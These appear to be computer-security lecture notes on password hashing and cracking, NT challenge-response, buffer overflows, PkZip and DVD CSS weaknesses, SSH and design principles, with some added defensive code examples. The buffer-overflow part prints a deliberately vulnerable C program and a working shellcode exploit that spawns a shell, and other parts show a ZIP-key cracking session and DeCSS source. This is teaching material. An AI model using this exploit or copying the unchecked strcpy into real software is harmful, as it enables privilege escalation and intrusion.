Poor SUID: Sometimes there are scripts (shell or Perl) that perform certain tasks and run as root. If the scripts are writable by you, you can edit them and run them.
Non-cryptographic cracking
Buffer overflow: Buffer overflows are typically used to spawn root shells from a (server) process running as root.
Race conditions: A race condition is when a program creates a short opportunity for attack by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration.
Non-cryptographic cracking
Poor temporary files: Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temporary files and what permissions these files have, it might be possible to use links to create root-owned files.
Attacks using these methods can be launched locally on the target machine, or often remotely, by exploiting services with loopholes.
Protection
Can you protect yourself against attacks?
• Hack/crack yourself:
• Be vigilant:
• Reduce reliance:
• Use more secure systems:
• Update systems:
Finally: “It's not the end of the world!”
Computer Emergency Response Team
The CERT Coordination Center is the organization that grew from the computer emergency response team formed by the Defense Advanced Research Projects Agency (DARPA) in November 1988 in response to the needs identified during the Internet worm incident. The CERT charter is to work with the Internet community to facilitate its response to computer security events involving Internet hosts, to take proactive steps to raise the community's awareness of computer security issues, and to conduct research targeted at improving the security of existing systems.
CERT
If you are ever involved in a computer security incident it is useful to get in touch with CERT.
They provide incident reports and advisories, and can liaise with other system administration people if the attack on your system comes from outside your organization.
CERT Incident Note IN-99-04
Here is an excerpt from an incident report:
Similar Attacks Using Various RPC Services
Thursday, July 22, 1999
Overview
We have recently received an increasing number of reports that intruders are using similar methods to compromise systems. We have seen intruders exploit three different RPC service vulnerabilities; however, similar artifacts have been found on compromised systems.
...
SIGINT
Signals Intelligence (SIGINT) broke the Japanese military code and learned of plans to invade Midway Island.
In 1943 they began the VENONA project to examine encrypted Soviet diplomatic communications.
The messages were double-encrypted and were extremely difficult to crack.
Almost all of the US KGB messages in 1944 and 1945 were broken between 1947 and 1952.
NSA - National Security Agency
Successor of SIGINT
The National Security Agency is the USA's cryptologic organization.
It coordinates, directs, and performs highly specialized activities to protect U.S. information systems and produce foreign intelligence information.
NSA - National Security Agency
NSA employs the country's premier codemakers and codebreakers.
It is said to be the largest employer of mathematicians in the United States and perhaps the world.
Rainbow documents
The NSA created various documents describing the criteria for evaluating the security behaviour of machines.
These criteria were published in a series of documents with brightly coloured covers, and hence became known as the Rainbow series. (red book, yellow book...)
C2 security
DOD 5200.28-STD - “Department of Defense Trusted Computer System Evaluation Criteria”:
• To provide a standard to manufacturers (for security features related to confidentiality)...
• To provide DoD components with a metric with which to evaluate the degree of trust...
• To provide a basis for specifying security requirements in acquisition specifications.
C2 security example
The TCB[14] shall require users to identify themselves to it before beginning to perform any other actions that the TCB is expected to mediate.
Furthermore, the TCB shall use a protected mechanism (e.g., passwords) to authenticate the user's identity.
[14] Trusted Computing Base.
Microsoft and C2
Windows NT Workstation version 3.5 with U.S. Service Pack 3 was the first Microsoft product that has completed C2 testing, and is only certified if using the same hardware and installed software, and does not include any network connection. The NT utility c2config.exe sets up an NT system to pass the C2 tests.
The 1998 attacks on the Pentagon involved theft and modification of data, as well as denial-of-service. The attacked machines were C2-secure Windows NT machines.
UNIX and C2
Many UNIX systems have also got C2 certification, and come configured this way from the manufacturer.
There are numerous examples of hacked UNIX systems found on the Internet. In 1996, a site I managed in New Zealand was the target of a malicious attack by intruders from Australia and Belgium.
Given all this, C2 certification is probably not a good guide as to the security of your system.
Password security
Morris and Thompson article:
http://citeseer.nj.nec.com/morris79password.html
Computer generated passwords more predictable than user ones...
UNIX password security
UNIX systems are traditionally open systems, given their background in university environments.
As such, the security on them is often minimal.
It is common for UNIX accounts to be made available relatively freely.
For example, at the MIT Media lab[15] all computers have been password-free until recently.
[15] MIT - home of Kerberos!
UNIX password security
UNIX systems are vulnerable to a wide range of attacks, particularly internal attacks.
All Unix systems have a root account.
This account has a UID and GID of zero, and once root access is obtained on a UNIX system, there is very little that cannot be done.
UNIX accounts
Account passwords are constructed to meet the following requirements:
• Each password has at least six characters.
• Only the first eight characters are significant.
UNIX accounts
There are many other accounts found on Unix systems, not just those for clients:
sysadm - A System V administration account, and
daemon - A daemon process account, and
uucp - The UUCP owner, and
lp - The print spooler owner.
When protecting a UNIX system, we must protect all these accounts - not just root.
UNIX password file
Account information is kept in a file called /etc/passwd.
It normally consists of seven colon-delimited fields, and may look like the following:
hugo:aAbBcJJJx23F55:501:100:Hughs Account:/home/hugo:/bin/tcsh
/etc/passwd fields
hugo: The account or user name.
aAbBcJJJx23F55: A one-way encrypted (hashed) password
501: The UID - unique user number
100: The GID - group number for user.
Hughs Account: Account information.
/home/hugo: The account's home directory
/bin/tcsh: A program to run when you log in
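As an added example (not from the notes), a parser for the seven-field format above and the checks an administrator would run over such a file: accounts with an empty password field, hashes still readable in /etc/passwd rather than in /etc/shadow, two accounts with the same salt and hash (hence the same password, the situation the salt slides that follow discuss), and extra UID 0 accounts. Apart from hugo's line from the slide, the sample entries are constructed.

```python
import string

FIELDS = ("name", "password", "uid", "gid", "info", "home", "shell")
SHADOWED = {"x", "*", "!", "!!"}   # field values meaning "hash is in /etc/shadow" or "locked"
SALT_CHARS = string.ascii_letters + string.digits + "./"   # the 64 characters a crypt(3) salt uses


def parse_passwd(text: str) -> list:
    """Parse /etc/passwd-style text: exactly seven colon-delimited fields per line."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(parts)}")
        entry = dict(zip(FIELDS, parts))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entries.append(entry)
    return entries


def des_salt(hash_field: str) -> str:
    """Traditional crypt(3) output is 13 characters; the first two are the salt."""
    return hash_field[:2]


def salt_space() -> int:
    """Two salt characters from a 64-character set give 64^2 = 4096 variants per password."""
    return len(SALT_CHARS) ** 2


def audit(entries: list) -> list:
    """Findings as (account, code) pairs, in file order."""
    findings, seen = [], {}
    for e in entries:
        pw = e["password"]
        if pw == "":
            findings.append((e["name"], "empty-password"))
        elif pw not in SHADOWED:
            findings.append((e["name"], "hash-in-passwd"))   # world-readable, so crackable offline
            if pw in seen:                                    # same salt AND same hash => same password
                findings.append((e["name"], f"same-password-as:{seen[pw]}"))
            seen.setdefault(pw, e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "uid-0"))
    return findings


# Constructed sample file; only hugo's line comes from the notes.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/sbin:/sbin/nologin
hugo:aAbBcJJJx23F55:501:100:Hughs Account:/home/hugo:/bin/tcsh
toor:x:0:0:second admin:/root:/bin/sh
guest::502:100:Guest:/home/guest:/bin/sh
mia:k7Qz.9aXcR2Lw:503:100:Mia:/home/mia:/bin/sh
leo:k7Qz.9aXcR2Lw:504:100:Leo:/home/leo:/bin/sh
"""

if __name__ == "__main__":
    for name, code in audit(parse_passwd(SAMPLE_PASSWD)):
        print(f"{name:8} {code}")
    print("salt variants per password:", salt_space())
```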
UNIX passwords
When you log in with your account name and password, the password is encrypted and the resulting hash is compared to the hash stored in the password file.
If they are equal, the system accepts that you've typed in the correct password and grants you access.
UNIX passwords
UNIX uses a DES-like algorithm to calculate the encrypted password.
The password is used as the DES key (eight 7-bit characters make a 56 bit DES key) to encrypt a block of binary zeroes.
The result of this encryption is the hash value.
Note: the password is not encrypted, it is the key used to perform the encryption!
UNIX salt
A strengthening feature of UNIX is that it introduces two random characters in the algorithm (the salt).
This ensures that two equal passwords result in two different hashes.
From viewing the UNIX password file you can not tell if two persons have the same password.
UNIX salt
To prevent crackers from simply encrypting an entire dictionary and then looking up the hash, the salt was added to the algorithm to create a possible 4096 different hashes for a particular password.
This lengthens the cracking time because it becomes a little harder to store an encrypted dictionary online as the encrypted dictionary now would have to take up 4096 times the disk space.
This does not make password cracking harder, just more time consuming.
Crypt code
Sample crypt code from LINUX uClibc. The code has the following structure:
    extern char *crypt(const char *key, const char *salt)
    {
        /* Are we supposed to be using the MD5 replacement
         * instead of DES... */
        if (salt[0] == '$' && salt[1] == '1' && salt[2] == '$')
            return md5_crypt(key, salt);   /* uClibc's MD5-based crypt */
        else
            return des_crypt(key, salt);   /* traditional DES-based crypt */
    }
Cracking
It is very time consuming, but given enough time, brute force cracking will get the password.
The hashed passwords are compared with the entry in the /etc/passwd file.
BTW - You cannot try to log in using all the possible passwords, as UNIX systems enforce 10 second timeouts after three consecutive login failures.
Dictionary cracking
Dictionary password cracking is the most popular method for cracking Unix passwords.
The cracking program will take a word list, and one at a time try to crack one or all of the passwords listed in the password file.
Some password crackers will filter and/or mutate: substitute numbers for certain letters, add prefixes or suffixes, or switch case or order of letters.
Dictionary cracking
A popular cracking utility is called Crack.
Crack can use user-definable rules for word manipulation/mutation to maximize dictionary effectiveness.
Crack merges dictionaries, turns the password files into a sorted list, and generates lists of possible passwords from the merged dictionary or from information gleaned about users from the password file.
/etc/shadow passwords
Once the password hashes are moved to the shadow file, its permissions are changed as follows:

    opo 35# ls -l /etc/shadow
    -r--------   1 root     sys         3429 Aug 20 14:46 /etc/shadow
    opo 36#

These permissions ensure that ordinary users are unable to look at the password hashes, and hence are unable to try dictionary attacks.
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
Microsoft password security
Two one-way password hashes are stored on NT systems:
• a LanManager hash, and
• a Windows NT hash.
The LanManager hash supports the older LanManager protocol originally used in Windows and OS/2. In an all-NT environment it is desirable to turn off LanManager passwords, as they are easier to crack. The NT method uses a stronger algorithm and allows mixed-case passwords.
Microsoft password security
The database containing these hashes on an NT system is called the SAM (Security Access Manager).
If you have administrative access¹⁶, the program pwdump can extract the hashes.
¹⁶ Originally, anyone could extract the hashed passwords from the SAM, as Microsoft believed that “if they didn’t tell anyone the algorithms they used, no-one could discover what they had done”. Security through obscurity is not a safe strategy, and Jeremy Allison was able to de-obfuscate the SAM entries relatively quickly.
Microsoft salt
Microsoft does not salt during hash generation, so once a potential password has generated a hash it can be checked against all accounts.
The cracking software takes advantage of this.
LanManager encryption
LanManager encryption is created by taking the user’s plaintext password, capitalising it, and either truncating to 14 bytes, or padding to 14 bytes with null bytes.
This 14 byte value is used as two 56-bit DES keys to encrypt an eight byte value, forming a 16 byte value which is stored by the server and client.
This value is known as the hashed password.
NT encryption
Windows NT encryption is a higher quality mechanism, consisting of doing an MD4 hash on a Unicode version of the user’s password.
This also produces a 16 byte hash value that is non-reversible.
NT Password security
Note that the LANManager hash is similar to the UNIX level of cryptography
The NT hash is better
But... neither uses strong encryption, and
the network login mechanism has some problems.
Challenge response
[Figure: login network traffic between CLIENT and PDC, with a BAD GUY snooping on it.]
Challenge-response protocol
When a client wishes to use a resource, it first requests a connection and negotiates the protocol that the client and server will use.
In the reply to this request the server generates and appends an 8 byte, random value - this is stored in the server after the reply is sent and is known as the challenge.
It is different for every client connection.
Challenge-response protocol
The client then uses the hashed password (16 byte values described above), appended with 5 null bytes, as three 56 bit DES keys, each of which is used to encrypt the challenge 8 byte value, forming a 24 byte value known as the response.
This calculation is done on both hashes of the user’s password, and both responses are returned to the server, giving two 24 byte values.
Challenge-response protocol
The server then reproduces the above calculation, using its own value of the 16 byte hashed password and the challenge value that it kept during the initial protocol negotiation.
It then checks to see if the 24 byte value it calculates matches the 24 byte value returned to it from the client.
If these values match exactly, then the client knew the correct password and is allowed access.
Challenge-response protocol
There are good points about this:
• The server never knows or stores the cleartext of the user’s password - just the 16 byte hashed values derived from it.
• The cleartext password or 16 byte hashed values are never transmitted over the network - thus increasing security.
Challenge-response protocol
However, there is also a bad side:
• The 16 byte hashed values are a "password equivalent". You cannot derive the user’s password from them, but they can be used in a modified client to gain access to a server.
• The initial protocol negotiation is generally insecure, and can be hijacked in a range of ways. One common hijack involves convincing the server to allow clear-text passwords.
Challenge-response protocol
Despite functionality added to NT to protect unauthorized access to the SAM, the mechanism is trivially insecure.
Both the hashed values can be retrieved using the network sniffer mentioned before, and they are as good as passwords.
Attack
Relies on a flawed mechanism.
Even without network access, it is possible by various means to access the SAM password hashes, and with network access it is easy.
The hashed values are password equivalents, and may be used directly if you have modified client software.
The attack considered here is the use of either a dictionary, or brute force attack directly on the password hashes (which must first be collected somehow).
Attack
L0phtCrack is a tool for turning Microsoft Lan Manager and NT password hashes back into the original clear text passwords. It may be configured to run in different ways.
Dictionary cracking: L0phtCrack running on a Pentium Pro 200 checked a password file with 100 passwords against an 8 Megabyte (about 1,000,000 word) dictionary file in under one minute.
Brute force: L0phtCrack running on a Pentium Pro 200 checked a password file with 10 passwords using the alpha character set (A-Z) in 26 hours.
Attack time

    Character set size   Size of computation   Relative time taken
    26                   8.353 × 10^9          1.00
    36                   8.060 × 10^10         9.65
    46                   4.455 × 10^11         53.33
    68                   6.823 × 10^12         816.86

So if 26 characters takes 26 hours to complete, a worst-case scenario for 36 characters (A-Z,0-9) would take 250 hours or 10.5 days. A password such as take2asp1r1n would probably be computed in about 7 days.
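An added example (mine, not from the notes): the "size of computation" column is the number of candidate passwords of length 1 to 7 over each character set, which is the search space for one 7-byte half of a LanManager hash (the two 56-bit DES keys described above). The functions below reproduce the table exactly, scale the measured 26-hour baseline, and go one step beyond the table by comparing the two-halves search with a search over all 14 characters at once; the function and constant names are my own.

```c
#include <stdio.h>

/* Number of candidate passwords of length 1..max_len over a character set
 * of the given size: charset + charset^2 + ... + charset^max_len.
 * Exact for the table's values (the 68-character, 7-length sum still fits
 * in 64 bits). */
unsigned long long keyspace(unsigned charset, unsigned max_len) {
    unsigned long long total = 0, term = 1;
    for (unsigned k = 1; k <= max_len; k++) {
        term *= charset;
        total += term;
    }
    return total;
}

/* The same sum in floating point, for lengths where the exact sum overflows. */
double keyspace_approx(unsigned charset, unsigned max_len) {
    double total = 0.0, term = 1.0;
    for (unsigned k = 1; k <= max_len; k++) {
        term *= charset;
        total += term;
    }
    return total;
}

/* A LanManager hash is two independent DES operations, each keyed by 7
 * characters of the upper-cased password, so a cracker never has to search
 * more than 7 characters at a time. */
#define LM_HALF_LEN 7
#define LM_FULL_LEN 14

/* The table's "relative time taken": work for this set divided by work for A-Z. */
double relative_time(unsigned charset) {
    return (double)keyspace(charset, LM_HALF_LEN) /
           (double)keyspace(26, LM_HALF_LEN);
}

/* Scale the measured baseline (26 hours for A-Z on the Pentium Pro 200). */
double estimated_hours(unsigned charset, double baseline_hours_for_az) {
    return baseline_hours_for_az * relative_time(charset);
}

/* How many times more work a cracker would face if all 14 characters were
 * hashed as one unit instead of as two independent 7-character halves. */
double split_penalty(unsigned charset) {
    return keyspace_approx(charset, LM_FULL_LEN) /
           (2.0 * keyspace_approx(charset, LM_HALF_LEN));
}

int main(void) {
    const unsigned sets[] = {26, 36, 46, 68};
    printf("%-18s %-21s %s\n", "Character set size", "Size of computation",
           "Relative time taken");
    for (size_t i = 0; i < sizeof sets / sizeof sets[0]; i++)
        printf("%-18u %-21llu %.2f\n", sets[i],
               keyspace(sets[i], LM_HALF_LEN), relative_time(sets[i]));
    printf("A-Z,0-9 worst case: %.0f hours\n", estimated_hours(36, 26.0));
    printf("Hashing 7-char halves instead of 14 chars cuts the work by ~%.1e\n",
           split_penalty(26));
    return 0;
}
```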
Microsoft base security fix
1. Disable the use of LanManager passwords.
2. Don’t log in over the network as administrator.
3. Encrypt all network traffic.
4. Use long passwords, and all allowable characters.
5. Use an alternative login system.
6. Use an unsniffable network cabling system.
Chapter 10
Lecture 10 - More (in)security
Last session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
Buffer overflow
Most well known compromise of computer systems
One of a general class of problems caused by software that does not check its parameters for extreme values.
Buffer overflow
Examine the way programs use memory.
Presentation based on http://destroy.net/machines/security/P49-14-Aleph-One
Simple Program

    #include <stdio.h>
    #include <string.h>

    void main (int argc, char *argv[])
    {
        char buffer[512];

        printf ("Argument is %s\n", argv[1]);
        strcpy (buffer, argv[1]);   /* no length check: this is the overflow */
    }

CODE LISTING vulnerable.c
Simple Program
When we run it:

    [hugh@pnp176-44 programs]$ ./vulnerable test
    Argument is test
    [hugh@pnp176-44 programs]$ ./vulnerable "A Longer Test"
    Argument is A Longer Test
    [hugh@pnp176-44 programs]$
Simple program
[Figure: the computer’s memory with the stack growing downwards: the arguments, the return address, then the 512-byte buffer and the other local variables below it.]
Smashing the stack!
[Figure: the same layout after an oversized argument has been copied into the buffer, overwriting what lies above it, including the return address.]
Working and not working!

    [hugh@pnp176-44 programs]$ ./vulnerable ddddd
Exploit...

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define DEFAULT_OFFSET      0
    #define DEFAULT_BUFFER_SIZE 512
    #define NOP                 0x90

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    unsigned long get_sp (void)
    {
        __asm__ ("movl %esp,%eax");
    }

    void main (int argc, char *argv[])
    {
        char *buff, *ptr;
        long *addr_ptr, addr;
        int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
        int i;

        if (argc > 1) bsize  = atoi (argv[1]);
        if (argc > 2) offset = atoi (argv[2]);

        if (!(buff = malloc (bsize))) {
            printf ("Can't allocate memory.\n");
            exit (0);
        }

        addr = get_sp () - offset;
        printf ("Using address: 0x%x\n", addr);

        /* fill the whole buffer with the guessed return address */
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i += 4)
            *(addr_ptr++) = addr;

        /* first half: NOP sled */
        for (i = 0; i < bsize / 2; i++)
            buff[i] = NOP;

        /* shellcode in the middle */
        ptr = buff + ((bsize / 2) - (strlen (shellcode) / 2));
        for (i = 0; i < strlen (shellcode); i++)
            *(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';

        /* export it as $EGG for the next command */
        memcpy (buff, "EGG=", 4);
        putenv (buff);
        system ("/bin/bash");
    }

CODE LISTING exploit3.c
Exploit

    [hugh@pnp176-44 programs]$ ./exploit3 560
    Using address: 0xbfffe998
    [hugh@pnp176-44 programs]$ ./vulnerable $EGG
    Argument is ????????...???????
    sh-2.05b$

We are now within the vulnerable program process, but running the sh shell program, instead of the vulnerable program.
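An added example, not the lecture’s code: vulnerable.c fails in two places, it reads argv[1] without checking that an argument exists, and it copies with strcpy(), which trusts the caller for the length. The version below keeps the program’s behaviour for arguments that fit and refuses the rest instead of writing past the buffer; the function names are my own.

```c
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 512

/* Copy arg into buffer only if it fits, terminating NUL included.
 * Returns 0 on success and -1 when it would not fit; in that case the buffer
 * is left untouched so the caller cannot use a half-copied string. */
int bounded_copy(char *buffer, size_t buffer_size, const char *arg) {
    size_t len = strlen(arg);
    if (buffer_size == 0 || len >= buffer_size)
        return -1;
    memcpy(buffer, arg, len + 1);
    return 0;
}

/* How many bytes strcpy() would write past the end of a buffer of
 * buffer_size bytes for an argument of arg_len characters (0 if it fits).
 * For example, a 560-character argument against the 512-byte buffer above
 * spills 49 bytes, enough to reach the saved return address. */
size_t overflow_bytes(size_t arg_len, size_t buffer_size) {
    size_t needed = arg_len + 1;                 /* +1 for the NUL */
    return needed > buffer_size ? needed - buffer_size : 0;
}

int main(int argc, char *argv[]) {
    char buffer[BUFFER_SIZE];

    if (argc < 2) {                              /* vulnerable.c skipped this too */
        fprintf(stderr, "usage: %s <argument>\n", argv[0]);
        return 2;
    }
    printf("Argument is %s\n", argv[1]);
    if (bounded_copy(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long: %zu byte(s) would spill past the buffer\n",
                overflow_bytes(strlen(argv[1]), sizeof buffer));
        return 1;
    }
    return 0;
}
```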
Using the buffer overflow attack
A server (say a web server) that expects a query, and returns a response.
A CGI/ASP or perl script inside a web server
A SUID root program on a UNIX system
Example attack - Blaster
Recently we have been having a series of attacks on Microsoft systems that are based on various buffer overflow problems.
The Blaster worm is described in the CERT advisory “CA-2003-20 W32/Blaster worm”:
The W32/Blaster worm exploits a vulnerability in Microsoft’s DCOM RPC interface as described in VU#568148 and CA-2003-16. Upon successful execution....
Example attack CRC-32 on ssh
http://razor.bindview.com/publish/advisories/adv_ssh1crc.html
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
PkZip stream cipher
PkZip is for compressing files
PkZip can also scramble files when given a secret password.
Enciphering strategy is weak and can be cracked
http://citeseer.nj.nec.com/122586.html
Weakness in the (homegrown) ciphering algorithm
PkZip stream cipher

    opo 144% pkcrack -C all.zip -c readme.doc -P plain.zip -p readme.doc
    Files read. Starting stage 1 on Wed Sep 8 09:04:02 1999
    Generating 1st generation of possible key2_421 values...done.
    Found 4194304 possible key2-values.
    Now we're trying to reduce these...
    Done. Left with 18637 possible Values. bestOffset is 24.
    Stage 1 completed. Starting stage 2 on Thu Sep 9 09:12:06 1999
    Ta-daaaaa! key0=dda9e469, key1=96212999, key2=f9fc9651
    Probabilistic test succeeded for 402 bytes.
    Stage2 completed. Starting password search on Thu Sep 9 09:22:22 1999
    Key: 73 65 63 72 65 74
    Or as a string: 'secret' (without the enclosing single quotes)
    Finished on Thu Sep 9 10:54:22 1999
    opo 99%
    opo 145% ./zipdecrypt dda9e469 96212999 f9fc9651 all.zip rr.zip
    opo 146%

rr.zip contains the unencrypted version of the archive
PkZip stream cipher fix
The PkZip stream cipher is also susceptible to dictionary attacks, and so it is considered not suitable for secure encryption of data. The fix is:
Don’t use PkZip for security purposes.
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
DVD security
Content Scrambling System - data encryption scheme
Developed by commercial interests to stop copying... but
Easy to copy a DVD, but CSS prevents decrypting, changing and re-recording.
Details are trade secret.
Master set of 400 keys is stored on every DVD, and the DVD player uses these to generate a key needed to decrypt data from the disc.
DVD security
Linux users were excluded from access to CSS licenses because of the open-source nature of Linux.
In October 1999, hobbyists/hackers in Europe cracked the CSS algorithm
DVD industry players have been trying to prevent distribution of any software
The source code for decoding DVD is available on a T-shirt.
DVD security
The lesson to learn from this is that once again security-through-obscurity is a very poor strategy.
The source code and detailed descriptions for a CSS descrambler are available at:
http://www-2.cs.cmu.edu/~dst/DeCSS/Gallery/
DVD security
Description of the key/descrambling process:
First one must have a master key, which is unique to the DVD player manufacturer. It is also known as a player key. The player reads an encrypted disk key from the DVD, and uses its player key to decrypt the disk key. Then the player reads the encrypted title key for the file to be played. (The DVD will likely contain multiple files, typically 4 to 8, each with its own title key.) It uses the decrypted disk key (DK) to decrypt the title key. Finally, the decrypted title key, TK, is used to descramble the actual content.
DVD security
Confusion and diffusion...

    #define m(i)(x[i]^s[i+84])<<
    unsigned char x[5],y,s[2048];main(n){for(read(0,x,5);read(0,s,n=2048);write(1,s
    ,n))if(s[y=s[13]%8+20]/16%4==1){int i=m(1)17^256+m(0)8,k=m(2)0,j=m(4)17^m(3)9^k
    *2-k%8^8,a=0,c=26;for(s[y]-=16;--c;j*=2)a=a*2^i&1,i=i/2^j&1<<24;for(j=127;++j<n
    ;c=c>y)c+=y=i^i/8^i>>4^i>>12,i=i>>8^y<<17,a^=a>>14,y=a^a*8^a<<6,a=a>>8^y<<9,k=s
    [j],k="7Wo~'G_\216"[k&7]+2^"cr3sfw6v;*k+>/n."[k>>4]*2^k*257/8,s[j]=k^(k&k*2&34)
    *6^c+~y;}}
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
ssh
For logging in to a remote machine
Has secure encrypted communications, and...
You can’t snoop or sniff passwords.
TCP/IP connections can be forwarded over the secure channel.
ssh - proving identity
1. /etc/hosts.equiv: same user name? OK - log in!
2. ~/.rhosts: by user? OK - log in!
3. RSA: authentication using public-key cryptography.
4. TIS: trusted server to authenticate the user.
5. Passwords: password sent encrypted...
RSA key management
The file ~/.ssh/authorized_keys lists the public keys for logging in.
• Initially: ssh program tells the server which key pair it would like to use
• Challenge: server sends challenge encrypted with public key.
• Decrypt: client decrypts using private key. The challenge returned as proof
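An added example, not from the notes or from any ssh implementation: the three steps above as a round trip between server and client, with toy RSA whose modulus is below 2^32 so it runs without a bignum library. The parameter values, function names and the returning of the decrypted challenge itself are my simplifications (real keys are at least 1024 bits, and SSH1 actually returned a hash of the decrypted challenge); the structure of the exchange is the one the slide describes.

```c
#include <stdio.h>
#include <stdint.h>

/* Toy RSA parameters, constructed for this example.  n = p*q is below 2^32,
 * so every product of two residues fits in a uint64_t. */
#define TOY_P 65521ULL
#define TOY_Q 65519ULL
#define TOY_E 65537ULL

typedef struct { uint64_t n, e; } pubkey_t;    /* what ~/.ssh/authorized_keys holds */
typedef struct { uint64_t n, d; } privkey_t;   /* what only the client holds */

/* base^exp mod m by square-and-multiply; m < 2^32 keeps products in range. */
static uint64_t modpow(uint64_t base, uint64_t exp, uint64_t m) {
    uint64_t result = 1;
    base %= m;
    while (exp) {
        if (exp & 1) result = (result * base) % m;
        base = (base * base) % m;
        exp >>= 1;
    }
    return result;
}

/* Inverse of e modulo phi by the extended Euclidean algorithm. */
static uint64_t modinv(uint64_t e, uint64_t phi) {
    int64_t t = 0, newt = 1, r = (int64_t)phi, newr = (int64_t)e;
    while (newr != 0) {
        int64_t q = r / newr, tmp;
        tmp = t - q * newt; t = newt; newt = tmp;
        tmp = r - q * newr; r = newr; newr = tmp;
    }
    return (uint64_t)(t < 0 ? t + (int64_t)phi : t);
}

void toy_keygen(pubkey_t *pub, privkey_t *priv) {
    uint64_t n = TOY_P * TOY_Q, phi = (TOY_P - 1) * (TOY_Q - 1);
    pub->n = n;  pub->e = TOY_E;
    priv->n = n; priv->d = modinv(TOY_E, phi);
}

/* Server, "Challenge" step: encrypt a fresh value under the public key the
 * client named.  The value is passed in so the exchange is reproducible
 * here; a real server draws it from a CSPRNG and never reuses it. */
uint64_t server_challenge(const pubkey_t *pub, uint64_t challenge) {
    return modpow(challenge, pub->e, pub->n);
}

/* Client, "Decrypt" step: only the matching private key recovers the value. */
uint64_t client_response(const privkey_t *priv, uint64_t encrypted) {
    return modpow(encrypted, priv->d, priv->n);
}

/* Server: the proof is accepted only if what came back is what was sent. */
int server_verify(uint64_t challenge, uint64_t response) {
    return challenge == response;
}

/* The whole round trip; returns 1 when the client proves it holds the key. */
int run_exchange(const pubkey_t *pub, const privkey_t *priv, uint64_t challenge) {
    uint64_t enc  = server_challenge(pub, challenge);
    uint64_t resp = client_response(priv, enc);
    return server_verify(challenge, resp);
}

int main(void) {
    pubkey_t pub; privkey_t priv, wrong;
    toy_keygen(&pub, &priv);
    wrong = priv; wrong.d += 1;                  /* a client without the right key */
    uint64_t challenge = 1592726068ULL;          /* constructed; must be < n */
    printf("server -> client: %llu\n",
           (unsigned long long)server_challenge(&pub, challenge));
    printf("genuine client accepted: %d\n", run_exchange(&pub, &priv, challenge));
    printf("impostor accepted:       %d\n", run_exchange(&pub, &wrong, challenge));
    return 0;
}
```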
Port forwarding
Secure shell supports TCP/IP port forwarding
For example - if we wanted to use a secure channel to our X display on the local machine, the proxy listens for connections on a port, forwards the connection request and any data over the secure channel, and makes a connection to the real X display from the SSH Terminal.
Secure Sockets Layer (SSL)
Netscape has a protocol for data security - it uses 128-bit keys.
data encryption, server authentication, message integrity, and optional client authentication
SSL is an open, nonproprietary protocol
UN-SSL
Netscape weakly seeds a random number generator
Someone who can snoop the network and has access to an account can discover the seed
Expected search space similar to brute-forcing a 40-bit key
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
PGPfone
Speech compression and strong cryptography
Available in two versions:
1. An international version available outside America, and a prohibited import into America.
2. An American version available inside America, and a prohibited import out of America.
These two versions are also exactly the same! Restrictions on the import and export of munitions - strong cryptography is considered a munition.
PGPfone
Familiar encryption and key exchange parameters:
When initially setting up a link, Diffie-Hellman key exchange is used to ensure safety in the choice of an encryption key.
Chapter 11
Lecture 11 - Security
Last session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
Design principles
Paper by Saltzer and Schroeder, summarized below:
• Economy of mechanism: Keep the design as simple and small as possible. (identd assumption)
• Fail-safe defaults: Base access decisions on permission rather than exclusion. This is conservative design. (mail server - mail only access)
• Complete mediation: Every access to every object must be checked for authority. (DNS cache poisoning)
Design principles
• Open design: The design should not be secret. (DVDs, Microsoft SAM hashes...)
• Separation of privilege: Two keys are better than one. No single event can compromise the system. (su - password and wheel group)
• Least privilege: Every program and every user of the system should operate using the least set of privileges necessary to complete the job. (Military need-to-know)
Design principles
• Least common mechanism: Minimize the amount of mechanism common to more than one user and depended on by all users. (supervisor or library).
• Psychological acceptability: Human interface easy to use.
In the textbook there are examples of the use of each of these design principles.
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
Biometrics
Biometrics is the use of human physical characteristics to support authentication.
Biometrics - eyes
Minimal hardware biometrics
Voices - Record and process voice leading to either speaker verification or recognition.
Faces - Capture either a static or moving image of a face.
Keystrokes - capture a sequence of keystrokes, recording timing.
Combinations of characteristics may be used, but in general biometric techniques are not reliable on their own. Good second key for separation of privilege.
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
IPSec
IPSec is a set of standards intended to support communication security between networked computers, particularly in the newer IPv6 (IP Next-Generation) network.
IPSec software is available in Windows 2000, Linux, and on routers on the Internet.
http://www.faqs.org/rfcs/rfc2401.html
